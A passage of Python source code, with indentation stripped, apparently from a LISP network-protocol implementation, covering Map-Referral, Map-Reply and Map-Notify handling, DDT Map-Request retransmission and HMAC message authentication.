gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Add itr-in timestamp if telemetry data included in RLOC record..
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
